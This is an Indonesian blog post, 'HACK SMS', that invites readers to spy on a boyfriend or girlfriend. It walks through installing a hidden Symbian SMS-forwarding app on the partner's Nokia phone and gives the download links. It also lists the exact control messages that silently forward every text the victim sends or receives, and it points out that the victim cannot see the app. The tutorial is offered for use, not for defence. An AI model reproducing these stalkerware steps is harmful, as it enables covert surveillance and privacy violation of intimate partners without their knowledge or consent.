Hidup Untuk Berbagi

HACK SMS

pernah gak pacar lw selalu nyembunyiin hp nya?
sms ngumpet-ngumpet?…
mau tau doski sms apa aja?
gw nemu

cara nya ney…
Cara Pertama :
Cara Pertama :

Menyadap sms lewat Internet dengan mendaftar ke http://www.bloove.com
trus download file agent.sisx s60
pasang di hp yang akan di sadap…!
Gratis …..!!!

Cara Kedua :

Kalo cara yang di atas emang sedikit untuk lebih detailnya dengan software yang berbeda kaya gini nich

OK.. Pertama2x syaratnya :
HP adalah HP symbian. Baik HP kamu maupun HP korban.
HP Merek NOKIA
Memiliki aplikasi symbian. Baik HP kamu maupun HP korban.

Langkah2x nya seperti ini :

Kita akan menggunakan aplikasi smsanywherelite.sis sbg software penyadapnya. Bisa di download disini :
Code: http://rapidshare.com/files/199510713/Nemesis_SmsAnywhere_S60_2_0_v_1_4_1.SIS.html atau http://rapidlibrary.com/download_file_i.php?qq=sms+anywhere&file=831044&desc=SMS+Anywhere+streetballer+.rar
Filenya kecil kok , cuma 14 kb…
Masukkan / install aplikasi symbian ini di HP kamu dan HP korban
Begitu aplikasi ini diinstal, kamu tidak akan bisa melihat program tsb, begitu pula ikon aplikasi ini didalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Hal ini dikarenakan, aplikasi symbian ini belum mendukung GUI (Graphics User Interface). Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang korban tidak akan tahu kalau diponselnya telah dipasangi aplikasi tersebut. aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
Siapkan HP kamu dan HP korban
Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms :

SA(spasi)(password)(spasi)ON
Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketik:

SA 123456 ON lalu kirim sms ini ke nomor ponsel kamu.
Untuk mematikan / mengnonaktifkan aplikasi ini, ketik SA 123456 OFF lalu kirim ke nomor ponsel kamu.
Langkah selanjutnya, Ketikkan sms ini di HP korban agar setiap sms yg masuk di HP korban akan selalu diteruskan ke HP kamu :

SA(spasi)(password)(spasi)R1 misal SA 1234567 R1 sms ini ke nomor ponsel kamu.
Untuk mematikan fungsi ini, ganti parameter di belakang “R” menjadi nol. Sehingga menjadi SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan : SA 1234567 S1 dan kirim ke nomer ponsel kamu.
untuk mematikan fungsi ini, dengan mengirim sms SA 1234567 S0
Nah sekarang, setiap korban menerima dan mengirim sms, kamu akan mendapat terusannya sama persis dengan sms aslinya… keren kan…!!!

Selamat mencoba…!!!

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s